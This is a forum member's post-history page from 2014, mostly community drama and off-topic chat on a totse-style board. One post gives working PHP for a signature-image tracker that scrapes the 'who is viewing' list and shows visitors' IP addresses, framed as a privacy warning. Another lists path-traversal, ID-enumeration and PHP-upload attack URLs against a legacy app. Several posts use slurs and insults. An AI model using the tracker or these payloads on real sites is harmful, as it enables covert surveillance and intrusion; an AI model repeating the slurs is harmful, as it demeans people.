Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - burroughs

Pages: [1] 2 3 ... 5
1
Help & Suggestions / Re: To All Who Support This Site: Would You Like This Site to Continue?
« on: November 24, 2014, 10:19:10 pm »
I was hoping to see this place stay open, but after seeing the poll results I don't think it's worth it. There's nothing going on here except a forum (which I still surely appreciate), and with a bunch of knowledgeable people following Idio, I don't see this place progressing much further.

2
Bitch & Moan / Re: ATTN: Arnox
« on: November 22, 2014, 06:24:03 pm »
Quote from: starvingniglet on November 21, 2014, 08:33:17 pm
From what I understand, arnox was widely disliked at totse2 (or whatever the fuck its called, who cares)...so when he made his own site, anyone who wasn't mean to him was made a moderator here.  Other peers from totse2 who didn't get along with arnox, such as spectre, infinityshock, and fanglekai, were not only not made moderators, they are often infracted and banned because they used to make fun of arnox and now he is getting his revenge.

A more passive aggressive thin-skinned beta mormon I have never encountered.

Does this clear anything up for anyone?

Not remotely accurate. Arnox said plenty of stupid shit and was the butt of many jokes, but we were a very tight knit community. He was generally liked, and most of the users were at the very least entertained by him. I'll concede that he wasn't a very good moderator at the time, but not everyone is meant to be. Keep in mind that what we're talking about happened over the span of 5 years or so. People change.

&T2 wasn't very active when easy went AWOL. None of the long-time staff who could actually do something were that active either (Idio, Ghost, street carp, me). Arnox was not a mod at that time, and I give him a lot of credit for getting this started. I blame the state of this site on the &T2 staff who didn't do more to help him in the beginning or make this more of a collaborative effort, because I know he asked for help and tried reaching out to various people in the process.

Oh well, shit happens.

3
Help & Suggestions / Re: Should a new site be created by Idio?
« on: November 22, 2014, 05:57:26 pm »
New sites are awesome until the founder gets pissed off, shuts the place down, and breaks the hearts of his man child followers. Can we just get a sub-reddit or something? I have no more tears to spare for you faggots anymore.  :tdown:

4
Politics: Left, Right, and Center / Re: Ask a former political staffer/consultant anything
« on: November 17, 2014, 03:08:06 am »
Perhaps I'm just more aware of this as an adult, but do you feel like the general political climate has gotten more heated and divisive since the mid 2000's or so? People seem more set in their ways and affiliations, and in general seem to lack the ability to have a civil debate. Has this changed your job at all?

5
Spurious Generalities / Re: Somebody please make us a new board
« on: November 17, 2014, 02:55:24 am »
For any aspiring community founder please ask yourself the following questions. Do you care about..

...searchability, exposure, and a large user base?

Spoiler
Make a subreddit.

...keeping the &T feel of a standalone forum?

Spoiler
You need more than just a forum. Get creative.

...knowledgeable users and relative freedom from the long reach of the party van?

Spoiler
Take it to the d33p w3b.

6
Bitch & Moan / Re: ATTN: Trigger happy mod niggers
« on: November 17, 2014, 02:27:51 am »
Either I'm slightly colorblind or that is the most indecipherable captcha I've ever seen.

7
Network (in)Security / Why you should hide your online status on forums
« on: November 17, 2014, 01:47:28 am »
NOTE: Refresh this page once it loads for this first time to get the full effect. The referer is not set to this thread when clicking into it elsewhere.

This is a rehash of a post I made on &T2 awhile back.



What's going on?

PHP scripts can output images with the appropriate libraries - these scripts can be referenced as images in html and BB code just as any static file might be. But we can do whatever we want in our script before returning content, and we can do some pretty naughty things. Specifically:

  • Embed a script on a forum signature that outputs an image.
  • When a user loads this image, the http referer header will be the previous page they came from.
  • Using this referer value, we can make an http request back to the same page and parse the HTML looking for the "... is viewing this topic"
  • Even if there are multiple people viewing, we can make a guess at an IP address if we log enough requests through a process of elimination. We can also track their viewing habits over time.
  • We can disguise our image with some nice pr0n instead of politely informing a user that we know who they are.

Things we learned
  • You should always hide your online status on forums.
  • It's a bad idea to allow users to reference external resources, especially in areas with a lot of exposure like signatures.

Code

Code: [Select]
[img]http://bursylursy.webatu.com/tracking.php[/img]
Code: [Select]
<?php
header("Pragma-directive: no-cache");
header("Cache-directive: no-cache");
header("Cache-control: no-cache");
header("Pragma: no-cache");
header("Expires: 0");

error_reporting(0);
$ip =  $_SERVER["REMOTE_ADDR"];
$ref $_SERVER["HTTP_REFERER"];
$displayusers "";

if (strlen($ref) > 0) {
 header("Content-type: image/png");
 $response file_get_contents($ref);
 $doc = new DOMDocument();
 $doc->loadHTML($response);
 $users $doc->getElementById("whoisviewing")->nodeValue;

 if (strpos($users"Members") === false) {
 $displayusers "You are probably one of these users: " substr($users0strpos($users" and"));
 }

 $im imagecreate(90070);
 $bg imagecolorallocate($im255255255);
 $textcolor imagecolorallocate($im00255);

 imagestring($im555"Your ip address is: " $ip$textcolor);
 imagestring($im5525"You are viewing this page: " $ref$textcolor);
 imagestring($im5545$displayusers$textcolor);
imagepng($im);
 imagedestroy($im);
} else {
 header("Content-type: image/jpeg");
 $im imagecreatefromjpeg("http://www.quickmeme.com/img/fa/fa3e19ffd513583d5f7ae60382262d9a0505d72589cd2374af2b2a7de75e057d.jpg");
 imagejpeg($im);
 imagedestroy($im);
}
?>

8
Network (in)Security / Re: Horrendous Security Flaws I've encountered while working on a legacy SaaS app
« on: November 16, 2014, 09:39:16 pm »
Quote from: LiquidIce on November 16, 2014, 06:15:18 pm
But to be honest, let's think about it from the business side ie. the side that pays programmer's salaries: whether an application is exploitable, if it has a test suite, if it's updated, if it's meant to endure infrastructure failures (fucking 3rd party api going down or stalling on request = blocking the whole fucking application) doesn't matter at fucking all. This is what kills me at my job. Nobody cares if the code you sling is a 1000 line long procedural pool of diarrhea if if-else block nested 7 levels deep - as long as the css transitions look nice and the html adheres to the psd, and it's delivered on time - you're the fucking man.

Sorry for the slight rant, but I've the had the opportunity... no, wait, the joy of working with code from a senior developer whom everyone praises and I shit you not, this guy loaded a ton of logic into views (in an MVC based web app). Really, he couldn't take 30 minutes to refactor that out into a separate module that could be shared instead of duplicated?

Man, do we work at the same place?

The sad part is that when shit breaks, management sees it as a weakness in the technology used vs. the quality of the developer who worked on it. So while we have a moderately successful legacy application that requires a ton of maintenance, the higher ups have deemed that our successor application must be written with a string of unproven technology buzzwords.

Quote from: Lanny on November 16, 2014, 09:04:03 pm
Feel free to ask about anything you don't understand. The tech forms are always slow, I don't think anyone minds answering questions.

^ This, man. This so hard.

9
Network (in)Security / Re: Horrendous Security Flaws I've encountered while working on a legacy SaaS app
« on: November 15, 2014, 02:30:36 pm »
Quote from: Lanny on November 15, 2014, 12:16:44 am
I once worked on an app that had a long form where they shipped the (md5) hashed password and salt to the client after the first failed login so they could validate the password client side before sending it to the server. I was just surprised that whoever implemented it originally knew enough to salt and hash passwords but not enough to know not to send the digest to clients.

Goddamn, that is fucking awful.

Well, the app I work on doesn't even hash the password client side before sending it to the server. And there's no lockout on login attempts. The only solace is that the amount of requests needed to brute force a password would take down the server long before any progress was made.

10
Network (in)Security / Horrendous Security Flaws I've encountered while working on a legacy SaaS app
« on: November 14, 2014, 04:29:35 am »
1. Guess the database id on a page with no access checks:

Code: [Select]
/loaddoc.php?id=123
Let's get ALL OF THE DOCS

Code: [Select]
/loaddoc.php?id=124
/loaddoc.php?id=125
....
/loaddoc.php?id=9001

2. Load a file by name from a request parameter with no sanitizing:
 
Code: [Select]
/loaddoc.php?filename=order.pdf
:???:

Code: [Select]
/loaddoc.php?filename=/../../../IWonderWhereIamNow/nudes.zip
3. Upload arbitary files to a web directory with script execution enabled, don't check file extensions:

Code: [Select]
/uploads/uploaddoc.php?name=lolz.php
Unintentional and free web hosting!

Code: [Select]
/uploads/lolz.php
Do share yours.

11
Bitch & Moan / Re: Will Arnox ever successfully mod a female user? Lmfao.
« on: November 14, 2014, 04:09:44 am »
Quote from: MoaningLisa on November 14, 2014, 01:21:58 am
what was the girl that had 2 abortions, asked how to kill herself, and was a general clusterfuck of drama?

I think fangly ran her off...

oral_fixation :tdown:

12
Head Shrinkers / Fever Dreams
« on: November 14, 2014, 03:57:37 am »
Had an odd dream last night.

> go to grandparents' old house with friends
> odd because one is dead, the other is in a nursing home, and they haven't lived there for 10+ years
> go down to basement to grab food from freezer
> find freezer has been broken for awhile
> friend hands me a packaged, raw steak and says "Sorry, yours is spoiled"
> for some reason I open it and take a bite to verify
> yes, it's really spoiled
> spend the rest of the dream pulling tapeworms out of my mouth
> I really hate bugs

Quote
If one sees worms coming out of his mouth in a dream, it means that some members of his family are plotting against him, though he knows about it, and he will finally escape from their danger, but at his own expense.

http://dreamingthedreams.com/meanings/dreaming%20of%20tape%20worms/

LOLWUT

13
Help & Suggestions / Re: Advertising
« on: October 01, 2014, 12:44:29 am »
It's kind of a chicken and egg scenario where we want knowledgeable users to write good content but they won't join because there's not a lot of good content to begin with.

I always thought that totse-esque sites should offer some kind of freely available service in addition to hosting a community. Something simple and privacy / free speech related that's useful to the every-day user. A privnote clone, a simple proxy, or even something bitcoin related. Give lots of like-minded people a reason to use the site and they'll discover the community later.

14
Conspiracy! / Re: Boston bombing – a false flag terror case
« on: October 01, 2014, 12:07:04 am »
OP is clearly schizophrenic but has managed to find his way back to every &T2 incarnation. It wouldn't be home without him. <3

15
Spurious Generalities / Re: Arnox Exposed
« on: October 01, 2014, 12:02:34 am »
A Practical Guide to Dragons

lol dying

It brings a tear to mine eye having watched this awkward, dragon-obsessed teenager eternally progress to become our priesthood holder in this life and in the celestial kingdom. There is a place for you on Kolob my sweet Arnox, you just wait.

Pages: [1] 2 3 ... 5